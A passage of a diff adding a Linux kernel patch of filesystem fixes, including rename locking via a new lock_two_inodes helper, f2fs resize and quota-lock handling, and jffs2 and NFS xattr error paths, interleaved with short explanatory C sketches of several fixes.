+ 	unsigned int compacted_4b_initial, compacted_2b;
+ 	unsigned int amortizedshift;
+ 	erofs_off_t pos;
+ 
+-	if (lclusterbits != 12)
+-		return -EOPNOTSUPP;
+-
+ 	if (lcn >= totalidx)
+ 		return -EINVAL;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 5a3dbbabe23af..0e1aeb9cb4a7c 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -3834,19 +3834,10 @@ static int ext4_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			return retval;
+ 	}
+ 
+-	/*
+-	 * We need to protect against old.inode directory getting converted
+-	 * from inline directory format into a normal one.
+-	 */
+-	if (S_ISDIR(old.inode->i_mode))
+-		inode_lock_nested(old.inode, I_MUTEX_NONDIR2);
+-
+ 	old.bh = ext4_find_entry(old.dir, &old.dentry->d_name, &old.de,
+ 				 &old.inlined);
+-	if (IS_ERR(old.bh)) {
+-		retval = PTR_ERR(old.bh);
+-		goto unlock_moved_dir;
+-	}
++	if (IS_ERR(old.bh))
++		return PTR_ERR(old.bh);
+ 
+ 	/*
+ 	 *  Check for inode number is _not_ due to possible IO errors.
+@@ -4043,10 +4034,6 @@ release_bh:
+ 	brelse(old.bh);
+ 	brelse(new.bh);
+ 
+-unlock_moved_dir:
+-	if (S_ISDIR(old.inode->i_mode))
+-		inode_unlock(old.inode);
+-
+ 	return retval;
+ }
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index b160863eca141..e50d5848c1001 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1235,6 +1235,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	unsigned int last_index = cc->cluster_size - 1;
+ 	loff_t psize;
+ 	int i, err;
++	bool quota_inode = IS_NOQUOTA(inode);
+ 
+ 	/* we should bypass data pages to proceed the kworker jobs */
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+@@ -1242,7 +1243,7 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 		goto out_free;
+ 	}
+ 
+-	if (IS_NOQUOTA(inode)) {
++	if (quota_inode) {
+ 		/*
+ 		 * We need to wait for node_write to avoid block allocation during
+ 		 * checkpoint. This can only happen to quota writes which can cause
+@@ -1364,7 +1365,7 @@ unlock_continue:
+ 		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ 
+ 	f2fs_put_dnode(&dn);
+-	if (IS_NOQUOTA(inode))
++	if (quota_inode)
+ 		f2fs_up_read(&sbi->node_write);
+ 	else
+ 		f2fs_unlock_op(sbi);
+@@ -1390,7 +1391,7 @@ out_put_cic:
+ out_put_dnode:
+ 	f2fs_put_dnode(&dn);
+ out_unlock_op:
+-	if (IS_NOQUOTA(inode))
++	if (quota_inode)
+ 		f2fs_up_read(&sbi->node_write);
+ 	else
+ 		f2fs_unlock_op(sbi);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 36db9aab47790..c230824ab5e6e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2759,6 +2759,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	loff_t psize = (loff_t)(page->index + 1) << PAGE_SHIFT;
+ 	unsigned offset = 0;
+ 	bool need_balance_fs = false;
++	bool quota_inode = IS_NOQUOTA(inode);
+ 	int err = 0;
+ 	struct f2fs_io_info fio = {
+ 		.sbi = sbi,
+@@ -2816,19 +2817,19 @@ write:
+ 		goto out;
+ 
+ 	/* Dentry/quota blocks are controlled by checkpoint */
+-	if (S_ISDIR(inode->i_mode) || IS_NOQUOTA(inode)) {
++	if (S_ISDIR(inode->i_mode) || quota_inode) {
+ 		/*
+ 		 * We need to wait for node_write to avoid block allocation during
+ 		 * checkpoint. This can only happen to quota writes which can cause
+ 		 * the below discard race condition.
+ 		 */
+-		if (IS_NOQUOTA(inode))
++		if (quota_inode)
+ 			f2fs_down_read(&sbi->node_write);
+ 
+ 		fio.need_lock = LOCK_DONE;
+ 		err = f2fs_do_write_data_page(&fio);
+ 
+-		if (IS_NOQUOTA(inode))
++		if (quota_inode)
+ 			f2fs_up_read(&sbi->node_write);
+ 
+ 		goto done;
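
The compress.c and data.c hunks both snapshot IS_NOQUOTA(inode) into a local quota_inode, so the node_write lock taken under one answer is released under the same answer even if the inode's flags change in between. A toy sketch of why caching the predicate keeps lock/unlock paired (stub names, not the f2fs API):

#include <stdbool.h>
#include <stdio.h>

static bool noquota;			/* stands in for IS_NOQUOTA(inode) */
static void node_write_lock(void)	{ puts("lock node_write"); }
static void node_write_unlock(void)	{ puts("unlock node_write"); }

static void write_page(void)
{
	bool quota_inode = noquota;	/* snapshot the predicate once */

	if (quota_inode)
		node_write_lock();
	noquota = !noquota;		/* simulated mid-function flip */
	if (quota_inode)		/* pairs with the snapshot, not live state */
		node_write_unlock();
}

int main(void)
{
	noquota = true;
	write_page();
	return 0;
}
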
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 8d7dc76e6f935..4d1e48c676fab 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3817,7 +3817,7 @@ void f2fs_stop_gc_thread(struct f2fs_sb_info *sbi);
+ block_t f2fs_start_bidx_of_node(unsigned int node_ofs, struct inode *inode);
+ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control);
+ void f2fs_build_gc_manager(struct f2fs_sb_info *sbi);
+-int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count);
++int f2fs_resize_fs(struct file *filp, __u64 block_count);
+ int __init f2fs_create_garbage_collection_cache(void);
+ void f2fs_destroy_garbage_collection_cache(void);
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index dbad2db68f1bc..7b94f047cbf79 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2588,6 +2588,11 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 
+ 	inode_lock(inode);
+ 
++	if (is_inode_flag_set(inode, FI_COMPRESS_RELEASED)) {
++		err = -EINVAL;
++		goto unlock_out;
++	}
++
+ 	/* if in-place-update policy is enabled, don't waste time here */
+ 	set_inode_flag(inode, FI_OPU_WRITE);
+ 	if (f2fs_should_update_inplace(inode, NULL)) {
+@@ -2712,6 +2717,7 @@ clear_out:
+ 	clear_inode_flag(inode, FI_SKIP_WRITES);
+ out:
+ 	clear_inode_flag(inode, FI_OPU_WRITE);
++unlock_out:
+ 	inode_unlock(inode);
+ 	if (!err)
+ 		range->len = (u64)total << PAGE_SHIFT;
+@@ -3273,7 +3279,7 @@ static int f2fs_ioc_resize_fs(struct file *filp, unsigned long arg)
+ 			   sizeof(block_count)))
+ 		return -EFAULT;
+ 
+-	return f2fs_resize_fs(sbi, block_count);
++	return f2fs_resize_fs(filp, block_count);
+ }
+ 
+ static int f2fs_ioc_enable_verity(struct file *filp, unsigned long arg)
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 7e497f5b349ce..aa4d513daa8f8 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -2110,8 +2110,9 @@ static void update_fs_metadata(struct f2fs_sb_info *sbi, int secs)
+ 	}
+ }
+ 
+-int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
++int f2fs_resize_fs(struct file *filp, __u64 block_count)
+ {
++	struct f2fs_sb_info *sbi = F2FS_I_SB(file_inode(filp));
+ 	__u64 old_block_count, shrunk_blocks;
+ 	struct cp_control cpc = { CP_RESIZE, 0, 0, 0 };
+ 	unsigned int secs;
+@@ -2149,12 +2150,18 @@ int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
+ 		return -EINVAL;
+ 	}
+ 
++	err = mnt_want_write_file(filp);
++	if (err)
++		return err;
++
+ 	shrunk_blocks = old_block_count - block_count;
+ 	secs = div_u64(shrunk_blocks, BLKS_PER_SEC(sbi));
+ 
+ 	/* stop other GC */
+-	if (!f2fs_down_write_trylock(&sbi->gc_lock))
+-		return -EAGAIN;
++	if (!f2fs_down_write_trylock(&sbi->gc_lock)) {
++		err = -EAGAIN;
++		goto out_drop_write;
++	}
+ 
+ 	/* stop CP to protect MAIN_SEC in free_segment_range */
+ 	f2fs_lock_op(sbi);
+@@ -2174,10 +2181,20 @@ int f2fs_resize_fs(struct f2fs_sb_info *sbi, __u64 block_count)
+ out_unlock:
+ 	f2fs_unlock_op(sbi);
+ 	f2fs_up_write(&sbi->gc_lock);
++out_drop_write:
++	mnt_drop_write_file(filp);
+ 	if (err)
+ 		return err;
+ 
+-	freeze_super(sbi->sb);
++	err = freeze_super(sbi->sb);
++	if (err)
++		return err;
++
++	if (f2fs_readonly(sbi->sb)) {
++		thaw_super(sbi->sb);
++		return -EROFS;
++	}
++
+ 	f2fs_down_write(&sbi->gc_lock);
+ 	f2fs_down_write(&sbi->cp_global_sem);
+ 
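
The resize path above gains two checks: freeze_super() can fail and its return value must be honored, and a filesystem that went read-only in the meantime has to be thawed and refused. A sketch of that control flow, with stubs standing in for the f2fs calls:

#include <stdio.h>

static int freeze_super_stub(void)	{ return 0; }
static void thaw_super_stub(void)	{ }
static int readonly_stub(void)		{ return 1; }

static int resize_fs(void)
{
	int err = freeze_super_stub();

	if (err)		/* previously the return value was ignored */
		return err;
	if (readonly_stub()) {
		thaw_super_stub();	/* unwind the freeze before bailing */
		return -30;		/* -EROFS */
	}
	/* ... shrink under gc_lock / cp_global_sem ... */
	thaw_super_stub();
	return 0;
}

int main(void)
{
	printf("%d\n", resize_fs());
	return 0;
}
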
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index d879a295b688e..bd020a992c2e7 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -1002,20 +1002,12 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
+-	/*
+-	 * Copied from ext4_rename: we need to protect against old.inode
+-	 * directory getting converted from inline directory format into
+-	 * a normal one.
+-	 */
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
+-
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out_unlock_old;
++		goto out;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1123,9 +1115,6 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_unlock(old_inode);
+-
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1140,9 +1129,6 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
+-out_unlock_old:
+-	if (S_ISDIR(old_inode->i_mode))
+-		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 07419c3e42a52..a010b4bc36d2c 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -941,8 +941,10 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 	dn->ofs_in_node = 0;
+ 	f2fs_truncate_data_blocks(dn);
+ 	err = truncate_node(dn);
+-	if (err)
++	if (err) {
++		f2fs_put_page(page, 1);
+ 		return err;
++	}
+ 
+ 	return 1;
+ }
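
The truncate_dnode() fix is the classic release-on-error rule: once the node page reference is held, the error path must drop it exactly once before propagating err. A minimal sketch, with malloc()/free() standing in for the page reference:

#include <stdio.h>
#include <stdlib.h>

static void *get_node_page(void)	{ return malloc(1); }
static void put_node_page(void *p)	{ free(p); }
static int do_truncate_node(void)	{ return -5; /* pretend -EIO */ }

static int truncate_dnode(void)
{
	void *page = get_node_page();
	int err;

	if (!page)
		return -12;	/* -ENOMEM */
	err = do_truncate_node();
	if (err) {
		put_node_page(page);	/* the release the patch adds */
		return err;
	}
	put_node_page(page);
	return 1;	/* one dnode truncated */
}

int main(void)
{
	printf("%d\n", truncate_dnode());
	return 0;
}
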
+diff --git a/fs/fs_context.c b/fs/fs_context.c
+index 24ce12f0db32e..851214d1d013d 100644
+--- a/fs/fs_context.c
++++ b/fs/fs_context.c
+@@ -561,7 +561,8 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 			return -ENOMEM;
+ 	}
+ 
+-	ctx->legacy_data[size++] = ',';
++	if (size)
++		ctx->legacy_data[size++] = ',';
+ 	len = strlen(param->key);
+ 	memcpy(ctx->legacy_data + size, param->key, len);
+ 	size += len;
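
The one-line guard above keeps legacy mount data from starting with a stray comma when the buffer is still empty. A self-contained sketch of the join logic (simplified: no bounds checking, unlike the real legacy_parse_param()):

#include <stdio.h>
#include <string.h>

/* Append "key" to a comma-separated option string; the guard mirrors
 * the fix: no separator before the very first option. */
static size_t append_opt(char *buf, size_t size, const char *key)
{
	size_t len = strlen(key);

	if (size)
		buf[size++] = ',';
	memcpy(buf + size, key, len);
	return size + len;
}

int main(void)
{
	char buf[64];
	size_t size = 0;

	size = append_opt(buf, size, "noatime");
	size = append_opt(buf, size, "ro");
	buf[size] = '\0';
	printf("%s\n", buf);	/* "noatime,ro", not ",noatime,ro" */
	return 0;
}
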
+diff --git a/fs/gfs2/file.c b/fs/gfs2/file.c
+index bc6cd5f4b1077..c367f1678d5dc 100644
+--- a/fs/gfs2/file.c
++++ b/fs/gfs2/file.c
+@@ -1029,8 +1029,8 @@ static ssize_t gfs2_file_buffered_write(struct kiocb *iocb,
+ 	}
+ 
+ 	gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, gh);
+-retry:
+ 	if (should_fault_in_pages(from, iocb, &prev_count, &window_size)) {
++retry:
+ 		window_size -= fault_in_iov_iter_readable(from, window_size);
+ 		if (!window_size) {
+ 			ret = -EFAULT;
+diff --git a/fs/inode.c b/fs/inode.c
+index 8c4078889754f..6ae760db13116 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -1103,6 +1103,48 @@ void discard_new_inode(struct inode *inode)
+ }
+ EXPORT_SYMBOL(discard_new_inode);
+ 
++/**
++ * lock_two_inodes - lock two inodes (may be regular files but also dirs)
++ *
++ * Lock any non-NULL argument. The caller must make sure that if two
++ * directories are passed in, one is not an ancestor of the other.  Zero,
++ * one or two objects may be locked by this function.
++ *
++ * @inode1: first inode to lock
++ * @inode2: second inode to lock
++ * @subclass1: inode lock subclass for the first lock obtained
++ * @subclass2: inode lock subclass for the second lock obtained
++ */
++void lock_two_inodes(struct inode *inode1, struct inode *inode2,
++		     unsigned subclass1, unsigned subclass2)
++{
++	if (!inode1 || !inode2) {
++		/*
++		 * Make sure @subclass1 will be used for the acquired lock.
++		 * This is not strictly necessary (no current caller cares) but
++		 * let's keep things consistent.
++		 */
++		if (!inode1)
++			swap(inode1, inode2);
++		goto lock;
++	}
++
++	/*
++	 * If one object is a directory and the other is not, we must make sure
++	 * to lock the directory first as the other object may be its child.
++	 */
++	if (S_ISDIR(inode2->i_mode) == S_ISDIR(inode1->i_mode)) {
++		if (inode1 > inode2)
++			swap(inode1, inode2);
++	} else if (!S_ISDIR(inode1->i_mode))
++		swap(inode1, inode2);
++lock:
++	if (inode1)
++		inode_lock_nested(inode1, subclass1);
++	if (inode2 && inode2 != inode1)
++		inode_lock_nested(inode2, subclass2);
++}
++
+ /**
+  * lock_two_nondirectories - take two i_mutexes on non-directory objects
+  *
+diff --git a/fs/internal.h b/fs/internal.h
+index 5545c26d86ae5..46caa33373a48 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -153,6 +153,8 @@ extern long prune_icache_sb(struct super_block *sb, struct shrink_control *sc);
+ int dentry_needs_remove_privs(struct user_namespace *, struct dentry *dentry);
+ bool in_group_or_capable(struct user_namespace *mnt_userns,
+ 			 const struct inode *inode, vfsgid_t vfsgid);
++void lock_two_inodes(struct inode *inode1, struct inode *inode2,
++		     unsigned subclass1, unsigned subclass2);
+ 
+ /*
+  * fs-writeback.c
+diff --git a/fs/jffs2/build.c b/fs/jffs2/build.c
+index 837cd55fd4c5e..6ae9d6fefb861 100644
+--- a/fs/jffs2/build.c
++++ b/fs/jffs2/build.c
+@@ -211,7 +211,10 @@ static int jffs2_build_filesystem(struct jffs2_sb_info *c)
+ 		ic->scan_dents = NULL;
+ 		cond_resched();
+ 	}
+-	jffs2_build_xattr_subsystem(c);
++	ret = jffs2_build_xattr_subsystem(c);
++	if (ret)
++		goto exit;
++
+ 	c->flags &= ~JFFS2_SB_FLAG_BUILDING;
+ 
+ 	dbg_fsbuild("FS build complete\n");
+diff --git a/fs/jffs2/xattr.c b/fs/jffs2/xattr.c
+index da3e18503c658..acb4492f5970c 100644
+--- a/fs/jffs2/xattr.c
++++ b/fs/jffs2/xattr.c
+@@ -772,10 +772,10 @@ void jffs2_clear_xattr_subsystem(struct jffs2_sb_info *c)
+ }
+ 
+ #define XREF_TMPHASH_SIZE	(128)
+-void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
++int jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ {
+ 	struct jffs2_xattr_ref *ref, *_ref;
+-	struct jffs2_xattr_ref *xref_tmphash[XREF_TMPHASH_SIZE];
++	struct jffs2_xattr_ref **xref_tmphash;
+ 	struct jffs2_xattr_datum *xd, *_xd;
+ 	struct jffs2_inode_cache *ic;
+ 	struct jffs2_raw_node_ref *raw;
+@@ -784,9 +784,12 @@ void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ 
+ 	BUG_ON(!(c->flags & JFFS2_SB_FLAG_BUILDING));
+ 
++	xref_tmphash = kcalloc(XREF_TMPHASH_SIZE,
++			       sizeof(struct jffs2_xattr_ref *), GFP_KERNEL);
++	if (!xref_tmphash)
++		return -ENOMEM;
++
+ 	/* Phase.1 : Merge same xref */
+-	for (i=0; i < XREF_TMPHASH_SIZE; i++)
+-		xref_tmphash[i] = NULL;
+ 	for (ref=c->xref_temp; ref; ref=_ref) {
+ 		struct jffs2_xattr_ref *tmp;
+ 
+@@ -884,6 +887,8 @@ void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c)
+ 		     "%u of xref (%u dead, %u orphan) found.\n",
+ 		     xdatum_count, xdatum_unchecked_count, xdatum_orphan_count,
+ 		     xref_count, xref_dead_count, xref_orphan_count);
++	kfree(xref_tmphash);
++	return 0;
+ }
+ 
+ struct jffs2_xattr_datum *jffs2_setup_xattr_datum(struct jffs2_sb_info *c,
+diff --git a/fs/jffs2/xattr.h b/fs/jffs2/xattr.h
+index 720007b2fd65d..1b5030a3349db 100644
+--- a/fs/jffs2/xattr.h
++++ b/fs/jffs2/xattr.h
+@@ -71,7 +71,7 @@ static inline int is_xattr_ref_dead(struct jffs2_xattr_ref *ref)
+ #ifdef CONFIG_JFFS2_FS_XATTR
+ 
+ extern void jffs2_init_xattr_subsystem(struct jffs2_sb_info *c);
+-extern void jffs2_build_xattr_subsystem(struct jffs2_sb_info *c);
++extern int jffs2_build_xattr_subsystem(struct jffs2_sb_info *c);
+ extern void jffs2_clear_xattr_subsystem(struct jffs2_sb_info *c);
+ 
+ extern struct jffs2_xattr_datum *jffs2_setup_xattr_datum(struct jffs2_sb_info *c,
+@@ -103,7 +103,7 @@ extern ssize_t jffs2_listxattr(struct dentry *, char *, size_t);
+ #else
+ 
+ #define jffs2_init_xattr_subsystem(c)
+-#define jffs2_build_xattr_subsystem(c)
++#define jffs2_build_xattr_subsystem(c)		(0)
+ #define jffs2_clear_xattr_subsystem(c)
+ 
+ #define jffs2_xattr_do_crccheck_inode(c, ic)
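
The jffs2 hunks above replace a 128-entry pointer array, 1 KiB on 64-bit, on the kernel stack with a kcalloc() allocation, which forces the function and its callers to grow an error path. A userspace sketch with calloc() standing in for kcalloc():

#include <stdio.h>
#include <stdlib.h>

#define XREF_TMPHASH_SIZE	128

static int build_xattr_subsystem(void)
{
	/* 128 pointers is too big for a kernel stack frame,
	 * hence the move to the heap and a new -ENOMEM error path. */
	void **xref_tmphash = calloc(XREF_TMPHASH_SIZE, sizeof(*xref_tmphash));

	if (!xref_tmphash)
		return -12;	/* -ENOMEM */
	/* ... phase 1..3 hash-merge work using xref_tmphash ... */
	free(xref_tmphash);
	return 0;
}

int main(void)
{
	printf("%d\n", build_xattr_subsystem());
	return 0;
}
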
+diff --git a/fs/kernfs/dir.c b/fs/kernfs/dir.c
+index f33b3baad07cb..44842e6cf0a9b 100644
+--- a/fs/kernfs/dir.c
++++ b/fs/kernfs/dir.c
+@@ -652,7 +652,9 @@ static struct kernfs_node *__kernfs_new_node(struct kernfs_root *root,
+ 	return kn;
+ 
+  err_out3:
++	spin_lock(&kernfs_idr_lock);
+ 	idr_remove(&root->ino_idr, (u32)kernfs_ino(kn));
++	spin_unlock(&kernfs_idr_lock);
+  err_out2:
+ 	kmem_cache_free(kernfs_node_cache, kn);
+  err_out1:
+diff --git a/fs/lockd/svc.c b/fs/lockd/svc.c
+index 59ef8a1f843f3..5579e67da17db 100644
+--- a/fs/lockd/svc.c
++++ b/fs/lockd/svc.c
+@@ -355,7 +355,6 @@ static int lockd_get(void)
+ 	int error;
+ 
+ 	if (nlmsvc_serv) {
+-		svc_get(nlmsvc_serv);
+ 		nlmsvc_users++;
+ 		return 0;
+ 	}
+diff --git a/fs/namei.c b/fs/namei.c
+index 9155ecb547ce6..5b3865ad9d052 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -3007,8 +3007,8 @@ struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
+ 		return p;
+ 	}
+ 
+-	inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT2);
++	lock_two_inodes(p1->d_inode, p2->d_inode,
++			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+ 	return NULL;
+ }
+ EXPORT_SYMBOL(lock_rename);
+@@ -4661,7 +4661,7 @@ SYSCALL_DEFINE2(link, const char __user *, oldname, const char __user *, newname
+  *	   sb->s_vfs_rename_mutex. We might be more accurate, but that's another
+  *	   story.
+  *	c) we have to lock _four_ objects - parents and victim (if it exists),
+- *	   and source (if it is not a directory).
++ *	   and source.
+  *	   And that - after we got ->i_mutex on parents (until then we don't know
+  *	   whether the target exists).  Solution: try to be smart with locking
+  *	   order for inodes.  We rely on the fact that tree topology may change
+@@ -4745,10 +4745,16 @@ int vfs_rename(struct renamedata *rd)
+ 
+ 	take_dentry_name_snapshot(&old_name, old_dentry);
+ 	dget(new_dentry);
+-	if (!is_dir || (flags & RENAME_EXCHANGE))
+-		lock_two_nondirectories(source, target);
+-	else if (target)
+-		inode_lock(target);
++	/*
++	 * Lock all moved children. Moved directories may need to change their
++	 * parent pointer, so they need the lock to protect against concurrent
++	 * directory changes moving the parent pointer. For regular files we've
++	 * historically always done this. The lockdep locking subclasses are
++	 * somewhat arbitrary but RENAME_EXCHANGE in particular can swap
++	 * regular files and directories so it's difficult to tell which
++	 * subclasses to use.
++	 */
++	lock_two_inodes(source, target, I_MUTEX_NORMAL, I_MUTEX_NONDIR2);
+ 
+ 	error = -EPERM;
+ 	if (IS_SWAPFILE(source) || (target && IS_SWAPFILE(target)))
+@@ -4796,9 +4802,8 @@ int vfs_rename(struct renamedata *rd)
+ 			d_exchange(old_dentry, new_dentry);
+ 	}
+ out:
+-	if (!is_dir || (flags & RENAME_EXCHANGE))
+-		unlock_two_nondirectories(source, target);
+-	else if (target)
++	inode_unlock(source);
++	if (target)
+ 		inode_unlock(target);
+ 	dput(new_dentry);
+ 	if (!error) {
+diff --git a/fs/nfs/nfs42xattr.c b/fs/nfs/nfs42xattr.c
+index 76ae118342066..911f634ba3da7 100644
+--- a/fs/nfs/nfs42xattr.c
++++ b/fs/nfs/nfs42xattr.c
+@@ -991,6 +991,29 @@ static void nfs4_xattr_cache_init_once(void *p)
+ 	INIT_LIST_HEAD(&cache->dispose);
+ }
+ 
++static int nfs4_xattr_shrinker_init(struct shrinker *shrinker,
++				    struct list_lru *lru, const char *name)
++{
++	int ret = 0;
++
++	ret = register_shrinker(shrinker, name);
++	if (ret)
++		return ret;
++
++	ret = list_lru_init_memcg(lru, shrinker);
++	if (ret)
++		unregister_shrinker(shrinker);
++
++	return ret;
++}
++
++static void nfs4_xattr_shrinker_destroy(struct shrinker *shrinker,
++					struct list_lru *lru)
++{
++	unregister_shrinker(shrinker);
++	list_lru_destroy(lru);
++}
++
+ int __init nfs4_xattr_cache_init(void)
+ {
+ 	int ret = 0;
+@@ -1002,44 +1025,30 @@ int __init nfs4_xattr_cache_init(void)
+ 	if (nfs4_xattr_cache_cachep == NULL)
+ 		return -ENOMEM;
+ 
+-	ret = list_lru_init_memcg(&nfs4_xattr_large_entry_lru,
+-	    &nfs4_xattr_large_entry_shrinker);
+-	if (ret)
+-		goto out4;
+-
+-	ret = list_lru_init_memcg(&nfs4_xattr_entry_lru,
+-	    &nfs4_xattr_entry_shrinker);
+-	if (ret)
+-		goto out3;
+-
+-	ret = list_lru_init_memcg(&nfs4_xattr_cache_lru,
+-	    &nfs4_xattr_cache_shrinker);
+-	if (ret)
+-		goto out2;
+-
+-	ret = register_shrinker(&nfs4_xattr_cache_shrinker, "nfs-xattr_cache");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_cache_shrinker,
++				       &nfs4_xattr_cache_lru,
++				       "nfs-xattr_cache");
+ 	if (ret)
+ 		goto out1;
+ 
+-	ret = register_shrinker(&nfs4_xattr_entry_shrinker, "nfs-xattr_entry");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_entry_shrinker,
++				       &nfs4_xattr_entry_lru,
++				       "nfs-xattr_entry");
+ 	if (ret)
+-		goto out;
++		goto out2;
+ 
+-	ret = register_shrinker(&nfs4_xattr_large_entry_shrinker,
+-				"nfs-xattr_large_entry");
++	ret = nfs4_xattr_shrinker_init(&nfs4_xattr_large_entry_shrinker,
++				       &nfs4_xattr_large_entry_lru,
++				       "nfs-xattr_large_entry");
+ 	if (!ret)
+ 		return 0;
+ 
+-	unregister_shrinker(&nfs4_xattr_entry_shrinker);
+-out:
+-	unregister_shrinker(&nfs4_xattr_cache_shrinker);
+-out1:
+-	list_lru_destroy(&nfs4_xattr_cache_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_entry_shrinker,
++				    &nfs4_xattr_entry_lru);
+ out2:
+-	list_lru_destroy(&nfs4_xattr_entry_lru);
+-out3:
+-	list_lru_destroy(&nfs4_xattr_large_entry_lru);
+-out4:
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_cache_shrinker,
++				    &nfs4_xattr_cache_lru);
++out1:
+ 	kmem_cache_destroy(nfs4_xattr_cache_cachep);
+ 
+ 	return ret;
+@@ -1047,11 +1056,11 @@ out4:
+ 
+ void nfs4_xattr_cache_exit(void)
+ {
+-	unregister_shrinker(&nfs4_xattr_large_entry_shrinker);
+-	unregister_shrinker(&nfs4_xattr_entry_shrinker);
+-	unregister_shrinker(&nfs4_xattr_cache_shrinker);
+-	list_lru_destroy(&nfs4_xattr_large_entry_lru);
+-	list_lru_destroy(&nfs4_xattr_entry_lru);
+-	list_lru_destroy(&nfs4_xattr_cache_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_large_entry_shrinker,
++				    &nfs4_xattr_large_entry_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_entry_shrinker,
++				    &nfs4_xattr_entry_lru);
++	nfs4_xattr_shrinker_destroy(&nfs4_xattr_cache_shrinker,
++				    &nfs4_xattr_cache_lru);
+ 	kmem_cache_destroy(nfs4_xattr_cache_cachep);
+ }
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 70e76359909cc..177cb7b089b9a 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -921,6 +921,7 @@ out:
+ out_noaction:
+ 	return ret;
+ session_recover:
++	set_bit(NFS4_SLOT_TBL_DRAINING, &session->fc_slot_table.slot_tbl_state);
+ 	nfs4_schedule_session_recovery(session, status);
+ 	dprintk("%s ERROR: %d Reset session\n", __func__, status);
+ 	nfs41_sequence_free_slot(res);
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 8f5b41dc07734..8f90a87ee9ca0 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -3872,7 +3872,7 @@ nfsd4_encode_open(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_op
+ 		p = xdr_reserve_space(xdr, 32);
+ 		if (!p)
+ 			return nfserr_resource;
+-		*p++ = cpu_to_be32(0);
++		*p++ = cpu_to_be32(open->op_recall);
+ 
+ 		/*
+ 		 * TODO: space_limit's in delegations
+diff --git a/fs/notify/fanotify/fanotify_user.c b/fs/notify/fanotify/fanotify_user.c
+index 4546da4a54f95..9df5db0f10ff2 100644
+--- a/fs/notify/fanotify/fanotify_user.c
++++ b/fs/notify/fanotify/fanotify_user.c
+@@ -1574,6 +1574,20 @@ static int fanotify_events_supported(struct fsnotify_group *group,
+ 	    path->mnt->mnt_sb->s_type->fs_flags & FS_DISALLOW_NOTIFY_PERM)
+ 		return -EINVAL;
+ 
++	/*
++	 * mount and sb marks are not allowed on kernel internal pseudo fs,
